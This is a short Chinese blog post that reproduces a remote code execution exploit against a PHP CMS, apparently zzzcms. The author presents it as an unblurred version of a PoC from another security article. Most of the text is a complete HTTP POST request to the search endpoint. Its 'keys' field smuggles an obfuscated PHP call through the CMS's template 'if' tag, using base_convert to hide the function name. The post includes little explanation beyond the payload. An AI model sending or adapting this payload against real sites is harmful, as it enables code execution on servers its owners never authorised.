好久没有发文章了。在昨天在安全客看了一篇文章名称如下图

底下有一个cms利用姿势。想复现一波结果

大佬全是马赛库我去

这款cms之前没有见过。第一次见我花了好长时间终于学到了大佬的姿势我来一个高清无码的复现图。送给和我一样的小菜。忍受着看代码的痛苦

poc

POST /search/ HTTP/1.1
Host: www.fuckcms.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.fuckcms.com/form/?reg
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Cookie:PHPSESSID=ighlke8vh4ennfegq6qnd8jlg3; zzz847_usercheck=0; zzz847_keys=sdasfsdf
Connection: close
Content-Length: 69

keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}

那篇文章写得确实不错可看。就到这里吧